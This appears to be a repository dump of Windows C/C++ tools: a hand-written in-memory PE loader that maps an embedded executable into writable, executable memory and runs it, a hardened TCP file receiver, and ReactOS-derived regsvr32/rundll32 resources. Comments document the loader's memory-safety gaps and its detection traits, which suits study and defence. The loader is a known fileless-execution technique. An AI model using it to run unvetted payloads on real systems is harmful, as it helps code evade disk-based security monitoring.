-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 
10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 |
--------------------------------------------------------------------------------
/memoryload/memoryload.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the two system header names below were lost when this page
// was extracted; they are left as found.
#include
#include

//bin2hex.exe testexe.exe testexe.h hexcode
#ifdef _M_X64
#include "testexe64.h"
#else
#include "testexe.h"
#endif

// Signature through which the mapped image's entry point is called.
typedef int(__stdcall * EntryPoint)(int argc, char* argv[]);


// Map the PE image held in `buf` into the current process by hand and call
// its entry point with (argc, argv).
//
// Steps, in order: allocate SizeOfImage bytes as PAGE_EXECUTE_READWRITE, copy
// each section's raw data to its virtual address, apply base relocations,
// resolve imports with LoadLibraryA/GetProcAddress, call the entry point.
// Only section data is copied; the PE headers are not copied into the mapping.
//
// Returns FALSE when the allocation or a LoadLibraryA call fails, TRUE after
// the entry point has returned.
//
// NOTE(review): nothing in `buf` is validated. The DOS/NT signatures are not
// checked, and e_lfanew, NumberOfSections, SizeOfRawData, PointerToRawData,
// the section VirtualAddress and the directory RVAs are used as-is, so a
// malformed or hostile image causes out-of-bounds reads of `buf` and
// out-of-bounds writes past the mapping.
//
// Defender note: the image ends up in private memory that stays readable,
// writable and executable and is not backed by a file on disk; that
// combination is what memory scanners typically look for.
BOOL WINAPI MemoryLoad(void* buf, int argc, char* argv[])
{
    PCHAR pBuf = (PCHAR)buf;
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pBuf;
    // +4 skips the 4-byte signature that precedes the file header.
    PIMAGE_FILE_HEADER pFileHeader = (PIMAGE_FILE_HEADER)(pBuf + pDosHeader->e_lfanew + 4);
    PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER)(pFileHeader + 1);
    // The section table is located with the compile-time size of the optional
    // header, not with the SizeOfOptionalHeader field of the image.
    PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PCHAR)pOptionalHeader + sizeof(IMAGE_OPTIONAL_HEADER));

    LPBYTE Mapping = (LPBYTE)VirtualAlloc(NULL, pOptionalHeader->SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Mapping == NULL)
        return FALSE;

    // Copy every section's raw bytes to Mapping + VirtualAddress, one byte at
    // a time. NOTE(review): neither the source nor the destination range is
    // checked against the buffer or against SizeOfImage.
    for (int i = 0; i < pFileHeader->NumberOfSections; i++, pSectionHeader++)
    {
        LPVOID VirtualAddress = (LPVOID)((LPBYTE)Mapping + pSectionHeader->VirtualAddress);

        int count = pSectionHeader->SizeOfRawData;
        void * dst = VirtualAddress;
        const void * src = pBuf + pSectionHeader->PointerToRawData;

        while (count--)
        {
            *(char *)dst = *(char *)src;
            dst = (char *)dst + 1;
            src = (char *)src + 1;
        }
    }

    // Base relocations: add the difference between the actual mapping address
    // and the preferred ImageBase to every HIGHLOW / DIR64 entry.
    if (pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size)
    {
        PIMAGE_BASE_RELOCATION Reloc = (PIMAGE_BASE_RELOCATION)((ULONG_PTR)(pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) + (LPBYTE)(Mapping));
        LPBYTE dwImageBase = (LPBYTE)Mapping;
        ULONG_PTR iOffsetRlc = (LPBYTE)Mapping - (LPBYTE)pOptionalHeader->ImageBase;
        // NOTE(review): Size is never used; the loop below stops on a zero
        // VirtualAddress instead of on the directory size.
        ULONG Size = pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;

        LPBYTE vaddr;
        DWORD dwCount, dwMiniOffset, dwRelocateType;
        WORD *items = NULL;

        while (Reloc->VirtualAddress != NULL)
        {
            vaddr = dwImageBase + Reloc->VirtualAddress;
            // Number of 16-bit entries that follow the block header.
            dwCount = (Reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
            items = (WORD *)((char *)Reloc + sizeof(IMAGE_BASE_RELOCATION));

            for (DWORD i = 0; i < dwCount; ++i)
            {
                // Low 12 bits: offset inside the block; high 4 bits: type.
                dwMiniOffset = items[i] & 0x0fff;
                dwRelocateType = items[i] >> 12;
                if (dwRelocateType == IMAGE_REL_BASED_HIGHLOW || IMAGE_REL_BASED_DIR64 == dwRelocateType)
                {
                    (*(ULONG_PTR *)(vaddr + dwMiniOffset)) += iOffsetRlc;
                }
            }

            // The next block starts right after this block's entries.
            Reloc = (PIMAGE_BASE_RELOCATION)(items + dwCount);
        }
    }

    // Imports: load each named DLL into this process and write the resolved
    // addresses into the FirstThunk array.
    if (pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size)
    {
        PIMAGE_IMPORT_DESCRIPTOR pImport = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG_PTR)(pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) + (LPBYTE)(Mapping));
        PIMAGE_THUNK_DATA pOrgThunk, pFirstThunk;
        PIMAGE_IMPORT_BY_NAME pImportName;

        while (pImport->OriginalFirstThunk != NULL)
        {
            // DLL name as stored in the image; it is passed to LoadLibraryA
            // unchanged, so the normal DLL search order applies.
            char *name = (char*)Mapping + pImport->Name;

            FARPROC fpFun;
            HINSTANCE hInstance = LoadLibraryA(name);
            // NOTE(review): this early return leaves Mapping allocated.
            if (hInstance == NULL)
                return FALSE;

            pOrgThunk = (PIMAGE_THUNK_DATA)((LPBYTE)Mapping + pImport->OriginalFirstThunk);
            pFirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)Mapping + pImport->FirstThunk);

            while (*(DWORD*)pOrgThunk != NULL)
            {
                // Import by ordinal when an ordinal flag is set, otherwise by name.
                if ((pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32) || (pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64))
                    fpFun = GetProcAddress(hInstance, (LPCSTR)(pOrgThunk->u1.Ordinal & 0x0000ffff));
                else
                {
                    pImportName = (PIMAGE_IMPORT_BY_NAME)((LPBYTE)Mapping + pOrgThunk->u1.AddressOfData);
                    fpFun = GetProcAddress(hInstance, (LPCSTR)pImportName->Name);
                }

                // NOTE(review): fpFun is stored without a NULL check.
                pFirstThunk->u1.Ordinal = (ULONG_PTR)fpFun;
                pFirstThunk++;
                pOrgThunk++;
            }
            pImport++;
        }
    }

    // Re-applies the protection the region was allocated with, so the whole
    // image stays writable and executable; per-section protections from the
    // section headers are never applied.
    DWORD lpflOldProtect = 0;
    VirtualProtect((void*)Mapping, pOptionalHeader->SizeOfImage, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
    LPVOID entry = (LPVOID)((LPBYTE)Mapping + pOptionalHeader->AddressOfEntryPoint);

    // Control passes to the mapped image here; the mapping is never freed.
    EntryPoint pEntryFunc = (EntryPoint)entry;
    pEntryFunc(argc, argv);

    return TRUE;
}

// Entry point: maps and runs the embedded image `hexcode` (presumably the
// byte array that bin2hex writes into testexe.h / testexe64.h, see the
// comment at the top of the file). The result of MemoryLoad is ignored.
int main(int argc, char* argv[])
{
    MemoryLoad(hexcode, argc, argv);
    return 0;
}
--------------------------------------------------------------------------------
/memoryload/memoryload.vcxproj:
--------------------------------------------------------------------------------
1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711} 23 | Win32Proj 24 | memoryload 25 | 8.1 26 | memoryload 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 |
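_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |
--------------------------------------------------------------------------------
/memoryload/memoryload.vcxproj.filters:
--------------------------------------------------------------------------------
1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 |
--------------------------------------------------------------------------------
/recvfile/recvfile.c:
--------------------------------------------------------------------------------
/* NOTE(review): the three system header names below were lost when this page
   was extracted; they are left as found. */
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")


/* Print the usage line for `prog` to stderr and terminate with EXIT_FAILURE. */
void show_usage_and_exit(const char *prog)
{
    fprintf(stderr, "Usage: %s \n", prog);
    exit(EXIT_FAILURE);
}

/*
 * Wait up to `sec` seconds for data on `s`, then read at most `len` bytes
 * into `buf`.
 *
 * Returns the recv() result once the socket is readable (0 means the peer
 * closed the connection). Returns SOCKET_ERROR when nothing arrives in time
 * or when ioctlsocket()/select() fail; after a timeout the last error is
 * WSAETIMEDOUT. The socket is left open in every case, closing it is the
 * caller's job.
 *
 * The earlier version closed the socket and called exit() on a timeout, so
 * a single idle or stalled client terminated the whole listener.
 */
int recv_timeout(SOCKET s, char* buf, int len, int sec)
{
    fd_set fdSet;
    struct timeval time;
    u_long iMode = 1;
    int ready;

    /* Non-blocking mode, so recv() cannot stall after select() returns. */
    if (ioctlsocket(s, FIONBIO, &iMode) == SOCKET_ERROR)
        return SOCKET_ERROR;

    time.tv_sec = sec;
    time.tv_usec = 0;
    FD_ZERO(&fdSet);
    FD_SET(s, &fdSet);

    /* Winsock ignores the first argument of select(); kept as in the original. */
    ready = select((int)(s + 1), &fdSet, NULL, NULL, &time);
    if (ready == 0)
    {
        printf("timeout\n");
        WSASetLastError(WSAETIMEDOUT);
        return SOCKET_ERROR;
    }
    if (ready == SOCKET_ERROR)
        return SOCKET_ERROR;

    return recv(s, buf, len, 0);
}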
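/*
 * Accept only a bare file name: non-empty, no path separators, no ':'
 * (drive letters, alternate data streams), no control characters, and no
 * trailing '.' or ' ' (Win32 strips those, and "." / ".." are directories).
 * Returns 1 when `name` is acceptable, 0 otherwise.
 */
static int is_plain_filename(const char *name)
{
    int i;

    if (name[0] == '\0')
        return 0;
    for (i = 0; name[i] != '\0'; i++)
    {
        unsigned char c = (unsigned char)name[i];
        if (c < 0x20 || c == '\\' || c == '/' || c == ':')
            return 0;
    }
    return name[i - 1] != '.' && name[i - 1] != ' ';
}

/*
 * File receiver: listens on the TCP port given as the only argument and, for
 * each connection, reads a file name, answers "OK", then writes everything
 * the peer sends into that file in the current directory.
 *
 * The peer is unauthenticated and the socket is bound to INADDR_ANY, so the
 * file name and the data are untrusted input:
 *   - the name is limited to sizeof(filename) - 1 bytes; the earlier code
 *     read up to sizeof(filename) bytes and then wrote the terminator one
 *     byte past the array;
 *   - the name must be a bare file name (see is_plain_filename); the earlier
 *     code passed it to CreateFile unchanged, which let the peer choose any
 *     path the process could write to;
 *   - the file is opened with CREATE_NEW, so a peer can neither overwrite an
 *     existing file nor have one deleted by the clean-up on a failed
 *     transfer.
 * Not addressed here: there is no limit on the amount of data written, and
 * reserved device names are not filtered.
 *
 * Returns EXIT_FAILURE when the listener cannot be set up; the accept loop
 * itself never ends.
 */
int main(int argc, char** argv)
{
    char buf[8096];
    int listenPort;
    SOCKET server;
    WSADATA wsa;
    struct sockaddr_in sin = { 0 };

    if (argc != 2)
        show_usage_and_exit(argv[0]);

    listenPort = atoi(argv[1]);
    if (listenPort <= 0 || listenPort > 65535)
        show_usage_and_exit(argv[0]);

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
    {
        printf("WSAStartup failed\n");
        return EXIT_FAILURE;
    }

    server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (server == INVALID_SOCKET)
    {
        printf("socket failed with error: %ld\n", WSAGetLastError());
        return EXIT_FAILURE;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons((u_short)listenPort);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;

    if (bind(server, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        printf("bind failed with error: %ld\n", WSAGetLastError());
        closesocket(server);
        return EXIT_FAILURE;
    }

    if (listen(server, 5) == SOCKET_ERROR)
    {
        printf("listen failed with error: %ld\n", WSAGetLastError());
        closesocket(server);
        return EXIT_FAILURE;
    }

    while (1)
    {
        char filename[1024] = { 0 };
        char* ok = "OK";
        DWORD dwWritten = 0;
        HANDLE hFile;
        int nRecv, nSend;
        int writeFailed = 0;

        SOCKET client = accept(server, NULL, NULL);
        if (client == INVALID_SOCKET)
        {
            printf("accept failed with error: %ld\n", WSAGetLastError());
            continue;
        }

        /* One byte is kept back for the terminator written below. */
        nRecv = recv_timeout(client, filename, sizeof(filename) - 1, 3);
        if (nRecv <= 0)
        {
            printf("recv failed with error: %ld\n", WSAGetLastError());
            closesocket(client);
            continue;
        }

        filename[nRecv] = '\0';

        /* Checked before the name is printed or used as a path. */
        if (!is_plain_filename(filename))
        {
            printf("rejected file name\n");
            closesocket(client);
            continue;
        }

        printf("recv filename:%s\n", filename);

        nSend = send(client, ok, (int)strlen(ok), 0);
        if (nSend <= 0)
        {
            printf("send failed with error: %ld\n", WSAGetLastError());
            closesocket(client);
            continue;
        }

        /* The A variants are named explicitly because filename is a char
           buffer; CREATE_NEW fails if the file already exists. */
        hFile = CreateFileA(filename, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("CreateFile failed with error: %ld\n", GetLastError());
            closesocket(client);
            continue;
        }

        nRecv = recv_timeout(client, buf, sizeof(buf), 3);
        if (nRecv <= 0)
        {
            printf("recv failed with error: %ld\n", WSAGetLastError());
            closesocket(client);
            CloseHandle(hFile);
            DeleteFileA(filename);
            continue;
        }

        while (nRecv > 0)
        {
            /* A failed or short write ends the transfer instead of being ignored. */
            if (!WriteFile(hFile, buf, nRecv, &dwWritten, NULL) || dwWritten != (DWORD)nRecv)
            {
                printf("WriteFile failed with error: %ld\n", GetLastError());
                writeFailed = 1;
                break;
            }
            nRecv = recv_timeout(client, buf, sizeof(buf), 3);
        }

        if (!writeFailed)
            printf("recv finished\n");

        closesocket(client);
        CloseHandle(hFile);
        /* Do not leave a partial file behind after a write error. */
        if (writeFailed)
            DeleteFileA(filename);
    }

    closesocket(server);

    return 0;
}

--------------------------------------------------------------------------------
/recvfile/recvfile.vcxproj:
--------------------------------------------------------------------------------
1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9} 23 | Win32Proj 24 | recvfile 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true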
123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /recvfile/recvfile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /regsvr32/en-US.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Moved all hardcoded strings to En.rc. 4 | * By Magnus Olsen 2005 magnus@itkonsult-olsen.com 5 | */ 6 | 7 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | 11 | IDS_UsageMessage, "%s\n\nUsage: regsvr32 [/u] [/s] [/c] [/n] [/i[:cmdline]] dllname\n\ 12 | /u - Unregister server\n\ 13 | /s - Silent; display no message boxes\n\ 14 | /c - Console output\n\ 15 | /i - Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall\n\ 16 | /n - Do not call DllRegisterServer; this option must be used with /i" 17 | 18 | IDS_NoDllSpecified, "No DLL name specified." 19 | 20 | IDS_InvalidFlag, "Unrecognized flag: %s" 21 | 22 | IDS_SwitchN_NoI, "Unrecognized flag: /n must be used with the /i switch" 23 | 24 | IDS_DllNotLoaded, "LoadLibrary('%s') failed.\nGetLastError returns 0x%08x." 
25 | 26 | IDS_MissingEntry, "%s was loaded, but the %s entry point was not found.\n\n\ 27 | %s may not be exported, or a corrupt version of %s may be in memory. Consider using PView to detect and remove it." 28 | 29 | IDS_FailureMessage, "%s in %s failed.\nReturn code was: 0x%08x" 30 | 31 | IDS_SuccessMessage "%s in %s succeeded." 32 | END 33 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.rc: -------------------------------------------------------------------------------- 1 | /* $Id: regsvr32.rc 24947 2006-11-28 21:07:03Z janderwald $ */ 2 | 3 | #include 4 | #define REACTOS_STR_FILE_DESCRIPTION "Register a COM component in the registry\0" 5 | #define REACTOS_STR_INTERNAL_NAME "regsvr32\0" 6 | #define REACTOS_STR_ORIGINAL_FILENAME "regsvr32.exe\0" 7 | 8 | #include "en-US.rc" 9 | 10 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6} 23 | Win32Proj 24 | regsvr32 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 
110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /regsvr32/resource.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #define RC_STRING_MAX_SIZE 4096 4 | #define IDS_UsageMessage 100 5 | #define IDS_NoDllSpecified 101 6 | #define IDS_InvalidFlag 102 7 | #define IDS_SwitchN_NoI 103 8 | #define IDS_DllNotLoaded 104 9 | #define IDS_MissingEntry 105 10 | #define IDS_FailureMessage 106 11 | #define IDS_SuccessMessage 107 12 | 13 | /* EOF */ 14 | -------------------------------------------------------------------------------- /removejunk.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo ---------------------------------------------------- 3 | echo Press any key to delete all files with ending: 4 | echo *.aps *.idb *.ncp 
*.obj *.pch *.tmp *.sbr 5 | echo Visual c++/.Net junk 6 | echo ---------------------------------------------------- 7 | pause 8 | 9 | del /F /Q /S *.aps *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.res *.ncb *.opt *.suo *.manifest *.dep *.tlog *.log *.lastbuildstate 10 | 11 | 12 | pause 13 | 14 | 15 | -------------------------------------------------------------------------------- /rundll32/lang/bg-BG.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/bg-BG.rc -------------------------------------------------------------------------------- /rundll32/lang/cs-CZ.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/cs-CZ.rc -------------------------------------------------------------------------------- /rundll32/lang/de-DE.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Translated into German. 
4 | * By Rouven Wessling 2005 pentiumforever@gmail.com 5 | */ 6 | 7 | LANGUAGE LANG_GERMAN, SUBLANG_NEUTRAL 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | IDS_DllNotLoaded, "LoadLibrary laden von '%s' fehlgeschlagen" 11 | IDS_MissingEntry, "Fehlender Eintrag:%s\nIn %s" 12 | END 13 | -------------------------------------------------------------------------------- /rundll32/lang/el-GR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/el-GR.rc -------------------------------------------------------------------------------- /rundll32/lang/en-US.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Moved all hardcoded strings to En.rc. 4 | * By Magnus Olsen 2005 magnus@itkonsult-olsen.com 5 | */ 6 | 7 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | IDS_DllNotLoaded, "LoadLibrary failed to load '%s'" 11 | IDS_MissingEntry, "Missing entry point:%s\nIn %s" 12 | END 13 | -------------------------------------------------------------------------------- /rundll32/lang/es-ES.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/es-ES.rc -------------------------------------------------------------------------------- /rundll32/lang/fr-FR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/fr-FR.rc -------------------------------------------------------------------------------- /rundll32/lang/hu-HU.rc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/hu-HU.rc -------------------------------------------------------------------------------- /rundll32/lang/id-ID.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | LANGUAGE LANG_INDONESIAN, SUBLANG_DEFAULT 4 | 5 | STRINGTABLE DISCARDABLE 6 | BEGIN 7 | IDS_DllNotLoaded, "LoadLibrary gagal untuk mengambil '%s'" 8 | IDS_MissingEntry, "entry point hilang:%s\nDalam %s" 9 | END 10 | -------------------------------------------------------------------------------- /rundll32/lang/it-IT.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | LANGUAGE LANG_ITALIAN, SUBLANG_NEUTRAL 4 | STRINGTABLE DISCARDABLE 5 | BEGIN 6 | IDS_DllNotLoaded, "LoadLibrary fallita '%s'" 7 | IDS_MissingEntry, "Manca:%s\nIn %s" 8 | END 9 | -------------------------------------------------------------------------------- /rundll32/lang/ja-JP.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ja-JP.rc -------------------------------------------------------------------------------- /rundll32/lang/lt-LT.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/lt-LT.rc -------------------------------------------------------------------------------- /rundll32/lang/nl-NL.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Translation done by Vertaald door Eric Janssen 4 | */ 5 | 6 | LANGUAGE LANG_DUTCH, SUBLANG_NEUTRAL 7 | STRINGTABLE DISCARDABLE 8 | BEGIN 9 | IDS_DllNotLoaded, "LoadLibrary kon '%s' niet laden" 10 | IDS_MissingEntry, "Entry 
point:%s\n niet gevonden In %s" 11 | END 12 | -------------------------------------------------------------------------------- /rundll32/lang/no-NO.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/no-NO.rc -------------------------------------------------------------------------------- /rundll32/lang/pl-PL.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/pl-PL.rc -------------------------------------------------------------------------------- /rundll32/lang/pt-BR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/pt-BR.rc 